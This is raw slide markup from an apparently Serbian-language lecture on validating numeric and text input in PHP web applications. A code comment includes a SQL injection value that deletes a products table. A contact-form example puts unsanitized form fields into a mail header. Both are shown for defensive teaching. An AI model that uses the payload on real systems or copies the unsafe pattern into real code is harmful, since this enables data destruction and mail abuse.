              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stranu</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-RS" sz="2000" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B05090305040302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Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rP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3217014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D3C69-DE55-4BFD-ADDD-9682F5BA2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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>brojnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>vrijednosti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AC46C-FC18-4709-8137-5D275A402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995363"/>
            <a:ext cx="7194550" cy="5146675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kôd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ujedno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primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za “best practice” u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovakvim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slučajevima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sr-Latn-M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570E6A-72D9-483A-9139-12726679A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1711325"/>
            <a:ext cx="8401050" cy="5146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&lt;?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php</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B05090305040302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// www.example.com/proizvod.php?id=15';DELETE FROM proizvodi;--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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// Prvo 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proveramo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 da li je uopšte zadat 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obezan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 parametar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if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(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empty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($_GET['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id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'])) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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// prikaži 404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}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// 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kastovanje</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B05090305040302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$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id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 = (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int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) $_GET['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id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']; // 15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="800" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B05090305040302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// optimizacija: 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sprečavamo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 nepotreban upit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if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($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id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 &lt;= 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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// prikaži 404</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="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// sada je upit siguran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="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$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sql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 = "SELECT * FROM proizvodi WHERE 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id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= '$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id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’”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204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//...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500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B05090305040302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1155016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081AB-0499-4B6A-B9F2-AAE2F2DFF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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tekstualnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ulaza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33E40-658F-435E-8390-8AE586267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219200"/>
            <a:ext cx="7194550" cy="49228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Dok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>filtriranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>brojeva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>relativno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostavno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>filtriranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tekstualnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nijansu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komplikovanije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/>
              <a:t>Za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>neke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prostije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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što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poštanski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>broj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>telefon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adresa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slični</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>možemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koristiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>postojeće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcije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Ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>smo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostavnu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kontakt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>popunjava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svojim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ličnim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podacima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adresom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</a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentarom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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Jednostavna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>skripta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršavala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kontakt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formu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slala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke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našu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adresu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izgleda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sr-Latn-ME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238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CA364-1E92-4A2D-9DDF-34E327D16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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tekstualnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ulaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…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DEE3E-6A5B-4FE3-97AD-E41FE6E23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pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-M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8B7A7F-4BD9-45C9-9403-C08AB406D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1290636"/>
            <a:ext cx="8401050" cy="49990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&lt;?php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podaci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sa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forme</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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ime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$_POST['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ime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'];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$email = $_POST['email'];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tekst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$_POST['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tekst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'];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Heder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za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ispis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pošiljaoca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u mail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klijentu</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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heder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"From: $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ime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&lt;$email&gt; \n\r";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slanje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email-a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na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našu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adresu</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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mail('kontakt@example.com', $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tekst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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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heder</a:t>
            </a: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3114033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565EA-DF95-443D-95E6-1B89DA8DF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Uvod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134C9-76A3-442B-9B64-B71D5BAC5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r>
              <a:rPr lang="en-GB" b="0" i="1" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>predstavljaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>programska</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>rješenja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kojima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pristupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>putem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> web browser (web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>preglednik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>čitač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pretraživač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Činjenica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>dostupne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>bilo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>vrijeme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>bilo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kojeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>mjesta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>računara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mobilnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>telefona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>dovela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> je do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ubrzanog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>razvoja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rasta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="1" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Njihova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>popularnost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široka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>primjena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ogleda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kroz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>primjenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> u internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>bankarstvu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>trgovini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>društvenim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>mrežama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>udaljenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pristupu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>podacima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sl. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Korišćenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>takvih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="1" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>često</a:t>
            </a:r>
